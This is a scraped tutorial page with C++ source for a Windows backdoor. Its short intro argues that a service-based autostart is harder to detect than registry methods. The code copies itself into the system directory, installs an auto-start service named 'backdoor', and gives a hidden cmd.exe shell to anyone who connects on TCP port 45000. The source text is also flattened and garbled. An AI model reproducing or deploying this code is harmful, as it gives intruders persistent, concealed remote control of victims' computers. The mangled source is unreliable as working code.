Secure Road--c/c++ realize backdoor service self-start

Source: Internet
Author: User
Tags sin

Brief introduction

There are many ways for a backdoor on a Windows NT system to start automatically, such as registry autorun, image hijacking, svchost autostart, and the service-based autostart introduced in this section. The author's claim is that service-based autostart is less likely to be discovered than the other three startup methods, which need to modify the registry.

Example C++ code
filename:serviceautorundemo.cpp//Creator: peterz1997//date:2018-5-4 23:19//comment:create Service to make the backdoor Run automatically////////////////////// #include <iostream> #include <WinSock2.h> #include < winsock.h> #include <windows.h> #include <Winsvc.h> #include <cstdio> #include <cstring># pragma comment (lib, "Ws2_32.lib") using namespace std; #define Service_op_error-1#define Service_already_run-2const unsigned int max_count = 255;           String Max lengthconst DWORD PORT = 45000; Listen portconst unsigned int link_count = 30; Max Link numberservice_status g_servicestatus; Service_status_handle g_hservicestatus;/** * @brief CallBack Function to Translate Service Control Code * @param dwcode Se Rvice Control Code */void WINAPI servicecontrol (DWORD dwcode) {switch (Dwcode) {//service pause case Service_conTROL_PAUSE:g_ServiceStatus.dwCurrentState = service_paused;        Break        Service Continuation Case SERVICE_CONTROL_CONTINUE:g_ServiceStatus.dwCurrentState = service_running;        Break        Service Stop Case SERVICE_CONTROL_STOP:g_ServiceStatus.dwCurrentState = service_stopped;        G_servicestatus.dwwin32exitcode = 0;        G_servicestatus.dwcheckpoint = 0;        G_servicestatus.dwwaithint = 0;    Break    Case Service_control_interrogate:break;    Default:break;  }//Set service state if (SetServiceStatus (g_hservicestatus, &g_servicestatus) = = 0) {printf ("Set service status    Error\n "); } return;     /** * @brief Start Remote Shell * @lpParam the Client Handle */dword WINAPI Startshell (lpvoid lpparam) {startupinfo si;    Process_information Pi;    CHAR Cmdline[max_count] = {0};    Getstartupinfo (&AMP;SI);    SI.CB = sizeof (STARTUPINFO);    Si.hstdinput = Si.hstdoutput = Si.hstderror = (HANDLE) Lpparam; Si.dwflags = STArtf_useshowwindow |    Startf_usestdhandles;    Si.wshowwindow = Sw_hide;    GetSystemDirectory (cmdline, sizeof (cmdline));    strcat_s (cmdline, sizeof (CmdLine), "\\cmd.exe"); while (!    
CreateProcess (NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &AMP;SI, &AMP;PI)) {Sleep (100);    } WaitForSingleObject (Pi.hprocess, INFINITE);    CloseHandle (pi.hprocess);    CloseHandle (Pi.hthread); return 0;} /** * @brief Service Running Function * @lpParam NULL */dword WINAPI runservice (lpvoid lpparam) {CHAR Wmessage[max_coun    T] = "<================= Welcome to back Door >_< ==================>\n";    SOCKET sclient[30];    DWORD dwthreadid[30];    HANDLE hthread[30];    Wsadata WSD;        if (WSAStartup (0x0202, &AMP;WSD)) {printf ("WSAStartup Process error\n");    return 0;    } SOCKET Slisten = WSASocket (Af_inet, Sock_stream, ipproto_tcp, NULL, 0, 0);    Sockaddr_in sin;    sin.sin_family = af_inet;    Sin.sin_port = htons (port); Sin.sin_addr. S_un. S_aDDR = Inaddr_any;    if (Bind (Slisten, (lpsockaddr) &sin, sizeof (SIN))) return 0;    if (Listen (Slisten, link_count)) return 0;        for (int i = 0; i < Link_count; i++) {Sclient[i] = accept (Slisten, NULL, NULL);        Hthread[i] = CreateThread (NULL, 0, Startshell, (LPVOID) sclient[i], 0, &dwthreadid[i]);    Send (Sclient[i], Wmessage, strlen (Wmessage), 0);    } waitformultipleobjects (Link_count, Hthread, TRUE, INFINITE); return 0;}    /** * @brief The Main Function of the Service */void WINAPI servicemain (DWORD dwargc, LPTSTR *lpargv) {HANDLE hthread;    G_servicestatus.dwcheckpoint = 0; g_servicestatus.dwcontrolsaccepted = Service_accept_pause_continue |    Service_accept_stop;    G_servicestatus.dwcurrentstate = service_start_pending;    G_servicestatus.dwservicespecificexitcode = 0;    G_servicestatus.dwservicetype = Service_win32;    G_servicestatus.dwwaithint = 0;    G_servicestatus.dwwin32exitcode = 0; G_hservicestatus = RegisterServiceCtrlHandler ("Backdoor ", ServiceControl);        if (!g_hservicestatus) {printf ("Register Service error\n");    Return    } g_servicestatus.dwcurrentstate = service_running;    G_servicestatus.dwcheckpoint = 0;    G_servicestatus.dwwaithint = 0; 
if (!        SetServiceStatus (G_hservicestatus, &g_servicestatus)) {printf ("Set servicestatus Error!\n");    Return    } hthread = CreateThread (null, 0, runservice, NULL, 0, NULL);    if (!hthread) {printf ("Create Thread error\n"); } return;    /** * @brief Install Service */int apientry installservice () {DWORD dwerrorcode;    Sc_handle Hscmanager;    Sc_handle Hservicehandle;    Service_status Ssservicestatus;    CHAR Szsystempath[max_count] = "n";    CHAR Szfileselfpath[max_count] = "n";    GetSystemDirectory (Szsystempath, sizeof (Szsystempath));    GetModuleFileName (NULL, Szfileselfpath, sizeof (Szfileselfpath));    strcat_s (Szsystempath, "\\sysWork.exe"); CopyFile (Szfileselfpath, Szsystempath, true);   Hscmanager = OpenSCManager (null, NULL, sc_manager_all_access);        if (!hscmanager) {printf ("Can not Open the Service manager\n");    return service_op_error;    } printf ("Service Manager opened success\n"); Hservicehandle = CreateService (Hscmanager, "backdoor", "backdoor", service_all_access, Service_win32_own_process,    Service_Auto_Start, Service_error_ignore, szsystempath, NULL, NULL, NULL, NULL, or NULL);        if (!hservicehandle) {Dwerrorcode = GetLastError (); if (Dwerrorcode = = error_service_exists) {hservicehandle = OpenService (Hscmanager, "backdoor", Service_            all_access);                if (!hservicehandle) {printf ("Can not Create/open service\n");                Closeservicehandle (Hservicehandle);            return service_op_error;            } else {printf ("Service opened success\n"); }}} else {printf ("Service Create success\n "); } if (!        
StartService (hservicehandle, 0, NULL)) {Dwerrorcode = GetLastError ();            if (Dwerrorcode = = error_service_already_running) {printf ("Serveice is already running\n");            Closeservicehandle (Hservicehandle);            Closeservicehandle (Hscmanager);        return service_already_run;            } else {printf ("Serveice START error\n");            Closeservicehandle (Hservicehandle);            Closeservicehandle (Hscmanager);        return service_op_error; }} while (QueryServiceStatus (Hservicehandle, &ssservicestatus)) {if (ssservicestatus.dwcurrentstate            = = service_start_pending) {Sleep (100);        Continue } if (ssservicestatus.dwcurrentstate! = service_running) {printf ("SERVICE Start Process error\n"            );            Closeservicehandle (Hservicehandle);            Closeservicehandle (Hscmanager); Return SERVICe_op_error;        } else {break; }} if (!        QueryServiceStatus (Hservicehandle, &ssservicestatus)) {printf ("Service Status Get error\n");        Closeservicehandle (Hservicehandle);        Closeservicehandle (Hscmanager);    return service_op_error;    } printf ("Service Start success\n");    Closeservicehandle (Hservicehandle);    Closeservicehandle (Hscmanager); return 0;}    /** * @brief Remove Service */int removeservice () {Sc_handle hscmanager;    Sc_handle Hservicehandle;    Service_status Ssservicestatus;    Hscmanager = OpenSCManager (null, NULL, sc_manager_all_access);        if (!hscmanager) {printf ("Open Service Manager error\n");    return service_op_error;    } printf ("Open Service Manager success\n");    Hservicehandle = OpenService (Hscmanager, "backdoor", service_all_access);        if (!hservicehandle) {printf ("Open Service error\n");    return service_op_error; } printf ("Open Service Success\n "); if (QueryServiceStatus (Hservicehandle, &ssservicestatus)) {if (ssservicestatus.dwcurrentstate = = SERVICE_RU        nning) {ControlService (Hservicehandle, Service_control_stop, 
&ssservicestatus);        }} else {printf ("Service Status Get error\n");        Closeservicehandle (Hservicehandle);        Closeservicehandle (Hscmanager);    return service_op_error; } if (!        DeleteService (Hservicehandle)) {printf ("Delete Service error\n");        Closeservicehandle (Hservicehandle);        Closeservicehandle (Hscmanager);    return service_op_error;    } printf ("Remove Service success\n");    Closeservicehandle (Hservicehandle);    Closeservicehandle (Hscmanager); return 0;} /** * @brief main Function */int main (int argc, char* argv[]) {service_table_entry svtable[] = {{(LPSTR) "Backdo    or ", ServiceMain}, {null,null}};    StartServiceCtrlDispatcher (svtable); if (argc = = 2) {if (!STRICMP (argv[1], "--install")) {if (installservice () = = Service_op_error) {printf ("[!]            Service Operation Error\n ");            } else {printf ("[*]service Operation Success\n");            }} else if (!stricmp (argv[1], "--remove")) {if (removeservice () = = Service_op_error) {printf ("[!]            Service Operation Error\n ");            } else {printf ("[*]service Operation Success\n");        }} else {printf ("[Usage] = *.exe [--install]/[--remove]\n");    }} else {printf ("[Usage] = *.exe [--install]/[--remove]\n"); } return 0;}
